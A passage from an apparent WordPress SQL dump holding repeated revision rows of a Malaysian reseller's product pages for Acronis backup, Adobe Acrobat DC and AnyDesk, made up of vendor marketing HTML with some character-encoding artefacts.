src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n</center>\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<center>\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n</center>\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<div style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:45:39','2019-09-18 06:45:39','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3163,1,'2019-09-18 14:47:26','2019-09-18 06:47:26','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n\r\n&nbsp;\r\n\r\n<div class=\"row\" style=\"border: 1px solid #e9e9e9;\">\r\n<div class=\"col col-4\" style=\"border-right: 1px solid #e9e9e9;\">\r\n<div>\r\n\r\n<center>\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n</center>\r\n<h3>Active Ransomware Protection</h3>\r\n<div style=\"margin-bottom: 25px;\">Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\" style=\"border-right: 1px solid #e9e9e9;\">\r\n<div>\r\n\r\n<center>\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n</center>\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<center>\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n</center>\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<div style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:47:26','2019-09-18 06:47:26','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3162,1,'2019-09-18 14:47:05','2019-09-18 06:47:05','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n\r\n&nbsp;\r\n\r\n<div class=\"row\" style=\"border: 1px solid #e9e9e9;\">\r\n<div class=\"col col-4\" style=\"border-right: 1px solid #e9e9e9;\">\r\n<div>\r\n\r\n<center>\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n</center>\r\n<h3>Active Ransomware Protection</h3>\r\n<div style=\"margin-bottom: 100px;\">Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\" style=\"border-right: 1px solid #e9e9e9;\">\r\n<div>\r\n\r\n<center>\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n</center>\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<center>\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n</center>\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<div style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:47:05','2019-09-18 06:47:05','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3164,1,'2019-09-18 14:50:20','2019-09-18 06:50:20','<img class=\" wp-image-1696\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Logo-Adobe-1.jpg\" alt=\"Logo Adobe\" width=\"417\" height=\"277\" />\r\n\r\nAdobe Acrobat DC is the latest version of Acrobat subscription software.Â It\'s the most mobile, productive and collaborative PDF solution Adobe offers, combining Acrobat desktop software, mobile scan app, signature app and Acrobat Reader mobile app â€” enhanced with premium mobile features and premium Document Cloud services.\r\n\r\nAcrobat 2017 desktop software is available as a one-time purchase. It does not include quarterly Acrobat feature enhancements or access to premium Adobe Document Cloud services like Adobe Sign via your web browser and mobile devices.\r\n\r\nMany Acrobat DC tools and utilities are available to streamline enterprise deployments and help control IT costs.\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div class=\"text-padding-t3x dc-text\">\r\n<div class=\"text-3-block\"><span class=\"text-light\">The subscription to Acrobat DC includes the following:</span></div>\r\n<ul>\r\n 	<li class=\"text-3-block\"><span class=\"text-light\"><strong>Acrobat Pro or Acrobat Standard desktop software</strong> â€” including future feature updates, quarterly security enhancements &amp; improvements.</span></li>\r\n 	<li class=\"text-3-block\"><strong>Adobe Document Cloud services</strong>Â <span class=\"text-light\">â€”</span> complete essential PDF tasks with the Acrobat Reader mobile appÂ or in web browser, including storing &amp; sharing files online. Document Cloud services also enable complete workflows for sending, e-signing, and tracking documents.</li>\r\n 	<li class=\"text-3-block\"><strong>Adobe Sign subscription</strong>Â â€” a swipe-and-tap solution to collect, sign legal electronic and digital signatures on any device.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\">When you subscribe Acrobat Pro DC or Acrobat Standard DC, you pay a monthly or annual fee based on the plan you choose. And your product is always the most current release of Acrobat DC. You will never need to upgrade your product as long as you keep your subscription current.</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div>\r\n<div class=\"text-padding-t3x dc-text\">[maxbutton id=\"1\" ]</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\"></div>\r\n</div>\r\n</div>\r\n&nbsp;','Adobe','','inherit','closed','closed','','1436-revision-v1','','','2019-09-18 14:50:20','2019-09-18 06:50:20','',1436,'https://bintara.com.my/blog/2019/09/18/1436-revision-v1/',0,'revision','',0),(3165,1,'2019-09-18 14:51:58','2019-09-18 06:51:58','<img class=\" wp-image-1696\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Logo-Adobe-1.jpg\" alt=\"Logo Adobe\" width=\"417\" height=\"277\" />\n\nAdobe Acrobat DC is the latest version of Acrobat subscription software.Â It\'s the most mobile, productive and collaborative PDF solution Adobe offers, combining Acrobat desktop software, mobile scan app, signature app and Acrobat Reader mobile app â€” enhanced with premium mobile features and premium Document Cloud services.\n\nAcrobat 2017 desktop software is available as a one-time purchase. It does not include quarterly Acrobat feature enhancements or access to premium Adobe Document Cloud services like Adobe Sign via your web browser and mobile devices.\n\nMany Acrobat DC tools and utilities are available to streamline enterprise deployments and help control IT costs.\n<div>\n<div class=\"text-padding-t10x dc-collapse active\">\n<div class=\"dc-collapse-body\">\n<div class=\"text-padding-t3x dc-text\">\n<div class=\"text-3-block\"><span class=\"text-light\">The subscription to Acrobat DC includes the following:</span></div>\n<ul>\n 	<li class=\"text-3-block\"><span class=\"text-light\"><strong>Acrobat Pro or Acrobat Standard desktop software</strong> â€” including future feature updates, quarterly security enhancements &amp; improvements.</span></li>\n 	<li class=\"text-3-block\"><strong>Adobe Document Cloud services</strong>Â <span class=\"text-light\">â€”</span> complete essential PDF tasks with the Acrobat Reader mobile appÂ or in web browser, including storing &amp; sharing files online. Document Cloud services also enable complete workflows for sending, e-signing, and tracking documents.</li>\n 	<li class=\"text-3-block\"><strong>Adobe Sign subscription</strong>Â â€” a swipe-and-tap solution to collect, sign legal electronic and digital signatures on any device.</li>\n</ul>\n</div>\n</div>\n</div>\n</div>\n<div>\n<div class=\"text-padding-t10x dc-collapse\">\n<div class=\"dc-collapse-header\">When you subscribe Acrobat Pro DC or Acrobat Standard DC, you pay a monthly or annual fee based on the plan you choose. And your product is always the most current release of Acrobat DC. You will never need to upgrade your product as long as you keep your subscription current.</div>\n</div>\n</div>\n<div></div>\n<div></div>\n<div>\n<div class=\"text-padding-t10x dc-collapse active\">\n<div class=\"dc-collapse-body\">\n<div>\n\n<div class=\"text-padding-t3x dc-text\">[maxbutton id=\"1\" ]</div>\n</div>\n</div>\n</div>\n</div>\n<div>\n<div class=\"text-padding-t10x dc-collapse\">\n<div class=\"dc-collapse-header\"></div>\n</div>\n</div>\n&nbsp;','Adobe','','inherit','closed','closed','','1436-autosave-v1','','','2019-09-18 14:51:58','2019-09-18 06:51:58','',1436,'https://bintara.com.my/blog/2019/09/18/1436-autosave-v1/',0,'revision','',0),(3166,1,'2019-09-18 14:52:37','2019-09-18 06:52:37','<img class=\" wp-image-1696\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Logo-Adobe-1.jpg\" alt=\"Logo Adobe\" width=\"417\" height=\"277\" />\r\n\r\nAdobe Acrobat DC is the latest version of Acrobat subscription software.Â It\'s the most mobile, productive and collaborative PDF solution Adobe offers, combining Acrobat desktop software, mobile scan app, signature app and Acrobat Reader mobile app â€” enhanced with premium mobile features and premium Document Cloud services.\r\n\r\nAcrobat 2017 desktop software is available as a one-time purchase. It does not include quarterly Acrobat feature enhancements or access to premium Adobe Document Cloud services like Adobe Sign via your web browser and mobile devices.\r\n\r\nMany Acrobat DC tools and utilities are available to streamline enterprise deployments and help control IT costs.\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div class=\"text-padding-t3x dc-text\">\r\n<div class=\"text-3-block\"><span class=\"text-light\">The subscription to Acrobat DC includes the following:</span></div>\r\n<ul>\r\n 	<li class=\"text-3-block\"><span class=\"text-light\"><strong>Acrobat Pro or Acrobat Standard desktop software</strong> â€” including future feature updates, quarterly security enhancements &amp; improvements.</span></li>\r\n 	<li class=\"text-3-block\"><strong>Adobe Document Cloud services</strong>Â <span class=\"text-light\">â€”</span> complete essential PDF tasks with the Acrobat Reader mobile appÂ or in web browser, including storing &amp; sharing files online. Document Cloud services also enable complete workflows for sending, e-signing, and tracking documents.</li>\r\n 	<li class=\"text-3-block\"><strong>Adobe Sign subscription</strong>Â â€” a swipe-and-tap solution to collect, sign legal electronic and digital signatures on any device.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\">When you subscribe Acrobat Pro DC or Acrobat Standard DC, you pay a monthly or annual fee based on the plan you choose. And your product is always the most current release of Acrobat DC. You will never need to upgrade your product as long as you keep your subscription current.</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div>\r\n\r\n&nbsp;\r\n\r\n<div class=\"text-padding-t3x dc-text\">[maxbutton id=\"1\" ]</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\"></div>\r\n</div>\r\n</div>\r\n&nbsp;','Adobe','','inherit','closed','closed','','1436-revision-v1','','','2019-09-18 14:52:37','2019-09-18 06:52:37','',1436,'https://bintara.com.my/blog/2019/09/18/1436-revision-v1/',0,'revision','',0),(3167,1,'2019-09-18 14:53:10','2019-09-18 06:53:10','<img class=\" wp-image-1696\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Logo-Adobe-1.jpg\" alt=\"Logo Adobe\" width=\"417\" height=\"277\" />\r\n\r\nAdobe Acrobat DC is the latest version of Acrobat subscription software.Â It\'s the most mobile, productive and collaborative PDF solution Adobe offers, combining Acrobat desktop software, mobile scan app, signature app and Acrobat Reader mobile app â€” enhanced with premium mobile features and premium Document Cloud services.\r\n\r\nAcrobat 2017 desktop software is available as a one-time purchase. It does not include quarterly Acrobat feature enhancements or access to premium Adobe Document Cloud services like Adobe Sign via your web browser and mobile devices.\r\n\r\nMany Acrobat DC tools and utilities are available to streamline enterprise deployments and help control IT costs.\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div class=\"text-padding-t3x dc-text\">\r\n<div class=\"text-3-block\"><span class=\"text-light\">The subscription to Acrobat DC includes the following:</span></div>\r\n<ul>\r\n 	<li class=\"text-3-block\"><span class=\"text-light\"><strong>Acrobat Pro or Acrobat Standard desktop software</strong> â€” including future feature updates, quarterly security enhancements &amp; improvements.</span></li>\r\n 	<li class=\"text-3-block\"><strong>Adobe Document Cloud services</strong>Â <span class=\"text-light\">â€”</span> complete essential PDF tasks with the Acrobat Reader mobile appÂ or in web browser, including storing &amp; sharing files online. Document Cloud services also enable complete workflows for sending, e-signing, and tracking documents.</li>\r\n 	<li class=\"text-3-block\"><strong>Adobe Sign subscription</strong>Â â€” a swipe-and-tap solution to collect, sign legal electronic and digital signatures on any device.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\">When you subscribe Acrobat Pro DC or Acrobat Standard DC, you pay a monthly or annual fee based on the plan you choose. And your product is always the most current release of Acrobat DC. You will never need to upgrade your product as long as you keep your subscription current.</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div>\r\n\r\n&nbsp;\r\n\r\n<div class=\"text-padding-t3x dc-text\" style:\"text-align: center;\">[maxbutton id=\"1\" ]</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\"></div>\r\n</div>\r\n</div>\r\n&nbsp;','Adobe','','inherit','closed','closed','','1436-revision-v1','','','2019-09-18 14:53:10','2019-09-18 06:53:10','',1436,'https://bintara.com.my/blog/2019/09/18/1436-revision-v1/',0,'revision','',0),(3168,1,'2019-09-18 14:54:18','2019-09-18 06:54:18','<img class=\" wp-image-1696\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Logo-Adobe-1.jpg\" alt=\"Logo Adobe\" width=\"417\" height=\"277\" />\r\n\r\nAdobe Acrobat DC is the latest version of Acrobat subscription software.Â It\'s the most mobile, productive and collaborative PDF solution Adobe offers, combining Acrobat desktop software, mobile scan app, signature app and Acrobat Reader mobile app â€” enhanced with premium mobile features and premium Document Cloud services.\r\n\r\nAcrobat 2017 desktop software is available as a one-time purchase. It does not include quarterly Acrobat feature enhancements or access to premium Adobe Document Cloud services like Adobe Sign via your web browser and mobile devices.\r\n\r\nMany Acrobat DC tools and utilities are available to streamline enterprise deployments and help control IT costs.\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div class=\"text-padding-t3x dc-text\">\r\n<div class=\"text-3-block\"><span class=\"text-light\">The subscription to Acrobat DC includes the following:</span></div>\r\n<ul>\r\n 	<li class=\"text-3-block\"><span class=\"text-light\"><strong>Acrobat Pro or Acrobat Standard desktop software</strong> â€” including future feature updates, quarterly security enhancements &amp; improvements.</span></li>\r\n 	<li class=\"text-3-block\"><strong>Adobe Document Cloud services</strong>Â <span class=\"text-light\">â€”</span> complete essential PDF tasks with the Acrobat Reader mobile appÂ or in web browser, including storing &amp; sharing files online. Document Cloud services also enable complete workflows for sending, e-signing, and tracking documents.</li>\r\n 	<li class=\"text-3-block\"><strong>Adobe Sign subscription</strong>Â â€” a swipe-and-tap solution to collect, sign legal electronic and digital signatures on any device.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\">When you subscribe Acrobat Pro DC or Acrobat Standard DC, you pay a monthly or annual fee based on the plan you choose. And your product is always the most current release of Acrobat DC. You will never need to upgrade your product as long as you keep your subscription current.</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div>\r\n\r\n&nbsp;\r\n\r\n<div class=\"text-padding-t3x dc-text\" style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\"></div>\r\n</div>\r\n</div>\r\n&nbsp;','Adobe','','inherit','closed','closed','','1436-revision-v1','','','2019-09-18 14:54:18','2019-09-18 06:54:18','',1436,'https://bintara.com.my/blog/2019/09/18/1436-revision-v1/',0,'revision','',0),(3170,1,'2019-09-18 15:06:18','2019-09-18 07:06:18','<h1>Anydesk</h1>\r\n\r\n<h4 class=\"u-font-size-xl u-space-mt-1/2 u-space-mb-1/4\">Remote Desktop Software That Actually Works</h4>\r\n<div class=\"o-header__subheading u-font-size-m u-space-mb-1/4 u-color-mid-gray\">\r\n\r\nConnect to a computer remotely, be it from the other end of the office or halfway around the world. AnyDesk ensures secure and reliable remote desktop connections for IT professionals and on-the-go individuals alike.\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Unparalleled performance</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nLow latency, fast data transmissions, frame rates of 60 fps â€“ we know how critical these are when working on a remote desktop. Thatâ€™s why our innovative DeskRT codec ensures low lag, even at high screen resolutions or bandwidths of just 100 kB/s.\r\n\r\n</div>\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Multi-platform support</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk works across multiple platforms and operating systems: Windows, Linux, Free BSD, Mac OS, iOS and Android, plus we donâ€™t charge extra for mobile apps.\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Secure by design</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nYour security has been built into AnyDesk from day one. We use banking-standard TLS 1.2 technology to ensure your computer is protected from unauthorized access and RSA 2048 asymmetric encryption to verify every connection. Plus, our servers use Erlang telecommunication technology for maximum reliability.\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Built for pros, loved by all</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk has been designed and developed with IT professionals in mind, offering an unbeatable service for those who need fast, efficient and reliable remote access. AnyDesk is also a practical â€“ and totally free â€“ solution for private users.\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Grows with you</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAs teams grow, their needs evolve â€“ and so should the software they use. AnyDesk lets you start small and scale quickly, with sensible pricing for teams of all sizes.\r\n\r\n</div>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Anydesk','','inherit','closed','closed','','1437-revision-v1','','','2019-09-18 15:06:18','2019-09-18 07:06:18','',1437,'https://bintara.com.my/blog/2019/09/18/1437-revision-v1/',0,'revision','',0),(3169,1,'2019-09-18 15:05:58','2019-09-18 07:05:58','<h1>Anydesk</h1>\r\n\r\n &nbsp;\r\n\r\n<h4 class=\"u-font-size-xl u-space-mt-1/2 u-space-mb-1/4\">Remote Desktop Software That Actually Works</h4>\r\n<div class=\"o-header__subheading u-font-size-m u-space-mb-1/4 u-color-mid-gray\">\r\n\r\nConnect to a computer remotely, be it from the other end of the office or halfway around the world. AnyDesk ensures secure and reliable remote desktop connections for IT professionals and on-the-go individuals alike.\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Unparalleled performance</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nLow latency, fast data transmissions, frame rates of 60 fps â€“ we know how critical these are when working on a remote desktop. Thatâ€™s why our innovative DeskRT codec ensures low lag, even at high screen resolutions or bandwidths of just 100 kB/s.\r\n\r\n</div>\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Multi-platform support</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk works across multiple platforms and operating systems: Windows, Linux, Free BSD, Mac OS, iOS and Android, plus we donâ€™t charge extra for mobile apps.\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Secure by design</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nYour security has been built into AnyDesk from day one. We use banking-standard TLS 1.2 technology to ensure your computer is protected from unauthorized access and RSA 2048 asymmetric encryption to verify every connection. Plus, our servers use Erlang telecommunication technology for maximum reliability.\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Built for pros, loved by all</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk has been designed and developed with IT professionals in mind, offering an unbeatable service for those who need fast, efficient and reliable remote access. AnyDesk is also a practical â€“ and totally free â€“ solution for private users.\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Grows with you</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAs teams grow, their needs evolve â€“ and so should the software they use. AnyDesk lets you start small and scale quickly, with sensible pricing for teams of all sizes.\r\n\r\n</div>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Anydesk','','inherit','closed','closed','','1437-revision-v1','','','2019-09-18 15:05:58','2019-09-18 07:05:58','',1437,'https://bintara.com.my/blog/2019/09/18/1437-revision-v1/',0,'revision','',0),(3176,1,'2019-09-18 15:11:16','2019-09-18 07:11:16','<h1>Anydesk</h1>\r\n\r\n&nbsp;\r\n\r\n<h3 class=\"u-font-size-xl u-space-mt-1/2 u-space-mb-1/4\">Remote Desktop Software That Actually Works</h3>\r\n<div class=\"o-header__subheading u-font-size-m u-space-mb-1/4 u-color-mid-gray\">\r\n\r\nConnect to a computer remotely, be it from the other end of the office or halfway around the world. AnyDesk ensures secure and reliable remote desktop connections for IT professionals and on-the-go individuals alike.\r\n\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Unparalleled performance</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nLow latency, fast data transmissions, frame rates of 60 fps â€“ we know how critical these are when working on a remote desktop. Thatâ€™s why our innovative DeskRT codec ensures low lag, even at high screen resolutions or bandwidths of just 100 kB/s.\r\n</div>\r\n\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Multi-platform support</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk works across multiple platforms and operating systems: Windows, Linux, Free BSD, Mac OS, iOS and Android, plus we donâ€™t charge extra for mobile apps.\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Secure by design</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nYour security has been built into AnyDesk from day one. We use banking-standard TLS 1.2 technology to ensure your computer is protected from unauthorized access and RSA 2048 asymmetric encryption to verify every connection. Plus, our servers use Erlang telecommunication technology for maximum reliability.\r\n\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Built for pros, loved by all</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk has been designed and developed with IT professionals in mind, offering an unbeatable service for those who need fast, efficient and reliable remote access. AnyDesk is also a practical â€“ and totally free â€“ solution for private users.\r\n\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Grows with you</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAs teams grow, their needs evolve â€“ and so should the software they use. AnyDesk lets you start small and scale quickly, with sensible pricing for teams of all sizes.\r\n\r\n</div>\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Anydesk','','inherit','closed','closed','','1437-revision-v1','','','2019-09-18 15:11:16','2019-09-18 07:11:16','',1437,'https://bintara.com.my/blog/2019/09/18/1437-revision-v1/',0,'revision','',0),(3171,1,'2019-09-18 15:06:56','2019-09-18 07:06:56','<h1>Anydesk</h1>\r\n\r\n &nbsp;\r\n\r\n<h4 class=\"u-font-size-xl u-space-mt-1/2 u-space-mb-1/4\">Remote Desktop Software That Actually Works</h4>\r\n<div class=\"o-header__subheading u-font-size-m u-space-mb-1/4 u-color-mid-gray\">\r\n\r\nConnect to a computer remotely, be it from the other end of the office or halfway around the world. AnyDesk ensures secure and reliable remote desktop connections for IT professionals and on-the-go individuals alike.\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Unparalleled performance</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nLow latency, fast data transmissions, frame rates of 60 fps â€“ we know how critical these are when working on a remote desktop. Thatâ€™s why our innovative DeskRT codec ensures low lag, even at high screen resolutions or bandwidths of just 100 kB/s.\r\n\r\n</div>\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Multi-platform support</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk works across multiple platforms and operating systems: Windows, Linux, Free BSD, Mac OS, iOS and Android, plus we donâ€™t charge extra for mobile apps.\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Secure by design</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nYour security has been built into AnyDesk from day one. We use banking-standard TLS 1.2 technology to ensure your computer is protected from unauthorized access and RSA 2048 asymmetric encryption to verify every connection. Plus, our servers use Erlang telecommunication technology for maximum reliability.\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Built for pros, loved by all</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk has been designed and developed with IT professionals in mind, offering an unbeatable service for those who need fast, efficient and reliable remote access. AnyDesk is also a practical â€“ and totally free â€“ solution for private users.\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Grows with you</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAs teams grow, their needs evolve â€“ and so should the software they use. AnyDesk lets you start small and scale quickly, with sensible pricing for teams of all sizes.\r\n\r\n</div>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Anydesk','','inherit','closed','closed','','1437-revision-v1','','','2019-09-18 15:06:56','2019-09-18 07:06:56','',1437,'https://bintara.com.my/blog/2019/09/18/1437-revision-v1/',0,'revision','',0),(3174,1,'2019-09-18 15:09:58','2019-09-18 07:09:58','<h1>Anydesk</h1>\r\n\r\n&nbsp;\r\n\r\n<h3 class=\"u-font-size-xl u-space-mt-1/2 u-space-mb-1/4\">Remote Desktop Software That Actually Works</h3>\r\n<div class=\"o-header__subheading u-font-size-m u-space-mb-1/4 u-color-mid-gray\">\r\n\r\nConnect to a computer remotely, be it from the other end of the office or halfway around the world. AnyDesk ensures secure and reliable remote desktop connections for IT professionals and on-the-go individuals alike.\r\n\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Unparalleled performance</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nLow latency, fast data transmissions, frame rates of 60 fps â€“ we know how critical these are when working on a remote desktop. Thatâ€™s why our innovative DeskRT codec ensures low lag, even at high screen resolutions or bandwidths of just 100 kB/s.\r\n</div>\r\n\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Multi-platform support</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk works across multiple platforms and operating systems: Windows, Linux, Free BSD, Mac OS, iOS and Android, plus we donâ€™t charge extra for mobile apps.\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Secure by design</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nYour security has been built into AnyDesk from day one. We use banking-standard TLS 1.2 technology to ensure your computer is protected from unauthorized access and RSA 2048 asymmetric encryption to verify every connection. Plus, our servers use Erlang telecommunication technology for maximum reliability.\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Built for pros, loved by all</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk has been designed and developed with IT professionals in mind, offering an unbeatable service for those who need fast, efficient and reliable remote access. AnyDesk is also a practical â€“ and totally free â€“ solution for private users.\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Grows with you</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAs teams grow, their needs evolve â€“ and so should the software they use. AnyDesk lets you start small and scale quickly, with sensible pricing for teams of all sizes.\r\n\r\n</div>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Anydesk','','inherit','closed','closed','','1437-revision-v1','','','2019-09-18 15:09:58','2019-09-18 